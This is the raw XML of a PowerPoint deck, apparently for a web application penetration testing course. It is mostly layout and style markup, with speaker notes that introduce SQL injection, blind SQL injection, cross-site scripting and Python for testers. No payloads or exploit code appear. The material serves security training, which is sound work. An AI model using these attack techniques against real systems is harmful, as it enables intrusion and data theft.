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p:sldMasterIdLst>
    <p:sldMasterId id="2147483937" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId115"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId116"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="274" r:id="rId2"/>
    <p:sldId id="275" r:id="rId3"/>
    <p:sldId id="276" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="445" r:id="rId7"/>
    <p:sldId id="446" r:id="rId8"/>
    <p:sldId id="447" r:id="rId9"/>
    <p:sldId id="448" r:id="rId10"/>
    <p:sldId id="449" r:id="rId11"/>
    <p:sldId id="450" r:id="rId12"/>
    <p:sldId id="451" r:id="rId13"/>
    <p:sldId id="452" r:id="rId14"/>
    <p:sldId id="453" r:id="rId15"/>
    <p:sldId id="454" r:id="rId16"/>
    <p:sldId id="455" r:id="rId17"/>
    <p:sldId id="456" r:id="rId18"/>
    <p:sldId id="457" r:id="rId19"/>
    <p:sldId id="458" r:id="rId20"/>
    <p:sldId id="325" r:id="rId21"/>
    <p:sldId id="326" r:id="rId22"/>
    <p:sldId id="327" r:id="rId23"/>
    <p:sldId id="476" r:id="rId24"/>
    <p:sldId id="328" r:id="rId25"/>
    <p:sldId id="329" r:id="rId26"/>
    <p:sldId id="465" r:id="rId27"/>
    <p:sldId id="466" r:id="rId28"/>
    <p:sldId id="467" r:id="rId29"/>
    <p:sldId id="500" r:id="rId30"/>
    <p:sldId id="501" r:id="rId31"/>
    <p:sldId id="502" r:id="rId32"/>
    <p:sldId id="503" r:id="rId33"/>
    <p:sldId id="504" r:id="rId34"/>
    <p:sldId id="505" r:id="rId35"/>
    <p:sldId id="481" r:id="rId36"/>
    <p:sldId id="478" r:id="rId37"/>
    <p:sldId id="479" r:id="rId38"/>
    <p:sldId id="480" r:id="rId39"/>
    <p:sldId id="330" r:id="rId40"/>
    <p:sldId id="331" r:id="rId41"/>
    <p:sldId id="332" r:id="rId42"/>
    <p:sldId id="468" r:id="rId43"/>
    <p:sldId id="469" r:id="rId44"/>
    <p:sldId id="470" r:id="rId45"/>
    <p:sldId id="333" r:id="rId46"/>
    <p:sldId id="471" r:id="rId47"/>
    <p:sldId id="472" r:id="rId48"/>
    <p:sldId id="334" r:id="rId49"/>
    <p:sldId id="335" r:id="rId50"/>
    <p:sldId id="473" r:id="rId51"/>
    <p:sldId id="474" r:id="rId52"/>
    <p:sldId id="336" r:id="rId53"/>
    <p:sldId id="337" r:id="rId54"/>
    <p:sldId id="338" r:id="rId55"/>
    <p:sldId id="339" r:id="rId56"/>
    <p:sldId id="340" r:id="rId57"/>
    <p:sldId id="347" r:id="rId58"/>
    <p:sldId id="348" r:id="rId59"/>
    <p:sldId id="475" r:id="rId60"/>
    <p:sldId id="349" r:id="rId61"/>
    <p:sldId id="350" r:id="rId62"/>
    <p:sldId id="351" r:id="rId63"/>
    <p:sldId id="352" r:id="rId64"/>
    <p:sldId id="353" r:id="rId65"/>
    <p:sldId id="357" r:id="rId66"/>
    <p:sldId id="358" r:id="rId67"/>
    <p:sldId id="359" r:id="rId68"/>
    <p:sldId id="360" r:id="rId69"/>
    <p:sldId id="361" r:id="rId70"/>
    <p:sldId id="362" r:id="rId71"/>
    <p:sldId id="363" r:id="rId72"/>
    <p:sldId id="364" r:id="rId73"/>
    <p:sldId id="369" r:id="rId74"/>
    <p:sldId id="370" r:id="rId75"/>
    <p:sldId id="489" r:id="rId76"/>
    <p:sldId id="371" r:id="rId77"/>
    <p:sldId id="372" r:id="rId78"/>
    <p:sldId id="376" r:id="rId79"/>
    <p:sldId id="377" r:id="rId80"/>
    <p:sldId id="378" r:id="rId81"/>
    <p:sldId id="379" r:id="rId82"/>
    <p:sldId id="380" r:id="rId83"/>
    <p:sldId id="381" r:id="rId84"/>
    <p:sldId id="382" r:id="rId85"/>
    <p:sldId id="383" r:id="rId86"/>
    <p:sldId id="384" r:id="rId87"/>
    <p:sldId id="385" r:id="rId88"/>
    <p:sldId id="386" r:id="rId89"/>
    <p:sldId id="387" r:id="rId90"/>
    <p:sldId id="388" r:id="rId91"/>
    <p:sldId id="389" r:id="rId92"/>
    <p:sldId id="390" r:id="rId93"/>
    <p:sldId id="391" r:id="rId94"/>
    <p:sldId id="392" r:id="rId95"/>
    <p:sldId id="393" r:id="rId96"/>
    <p:sldId id="394" r:id="rId97"/>
    <p:sldId id="395" r:id="rId98"/>
    <p:sldId id="490" r:id="rId99"/>
    <p:sldId id="397" r:id="rId100"/>
    <p:sldId id="398" r:id="rId101"/>
    <p:sldId id="402" r:id="rId102"/>
    <p:sldId id="403" r:id="rId103"/>
    <p:sldId id="404" r:id="rId104"/>
    <p:sldId id="405" r:id="rId105"/>
    <p:sldId id="406" r:id="rId106"/>
    <p:sldId id="407" r:id="rId107"/>
    <p:sldId id="408" r:id="rId108"/>
    <p:sldId id="409" r:id="rId109"/>
    <p:sldId id="410" r:id="rId110"/>
    <p:sldId id="411" r:id="rId111"/>
    <p:sldId id="412" r:id="rId112"/>
    <p:sldId id="440" r:id="rId113"/>
    <p:sldId id="441" r:id="rId114"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId117"/>
      <p:bold r:id="rId118"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId119"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId119"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="4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4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4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4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4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4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hidden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00"/>
    <a:srgbClr val="99FFCC"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="000066"/>
    <a:srgbClr val="FF33CC"/>
    <a:srgbClr val="FFFF00"/>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91" autoAdjust="0"/>
    <p:restoredTop sz="96387" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="2335" y="331"/>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Lst>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="1642"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-2179" y="224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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId124"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide51.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5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2258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3168650" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96660" tIns="48329" rIns="96660" bIns="48329" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4146550" y="0"/>
            <a:ext cx="3168650" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96660" tIns="48329" rIns="96660" bIns="48329" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352260" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9121775"/>
            <a:ext cx="3168650" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96660" tIns="48329" rIns="96660" bIns="48329" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352261" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4146550" y="9121775"/>
            <a:ext cx="3168650" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96660" tIns="48329" rIns="96660" bIns="48329" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="966788">
              <a:defRPr sz="1300">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7B84F0AD-B8EC-4E4C-96AB-90A3127EB247}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36130586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944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9221" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4560888"/>
            <a:ext cx="5943600" cy="4354512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96660" tIns="48329" rIns="96660" bIns="48329"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="8991600"/>
            <a:ext cx="3170238" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217056432"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="10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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the next few days, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and these materials, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. As well as the vulnerabilities, you will learn the tools and methods of the attacker, so that you can be a powerful defender.</a:t>
            </a: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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python is used as both a scripting language, which is what we will focus on, and as the language used within a web application.  It was released in 1991 by Guido van Rossum and has recently taken off as one of the most popular languages round.  Most Linux environments and Mac OSX include it as part of the system install.  Windows will need it installed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The 3.x tree was released and breaks a lot of the backwards compatibility with 2.x.  We are going to focus on the 2.x tree as most tools still use it.</a:t>
            </a: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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305155" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this next exercise we will explore how to use the SQL inject me extension.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309251" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL injection is usually the result of a misguided attempt to protect against SQL injection by hiding the error messages generated by the database.. In this next section we are going to explore how it works.  We will also look at some of the tools available to help us with the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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0274" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3170238" cy="479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5139" tIns="49472" rIns="95139" bIns="49472"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
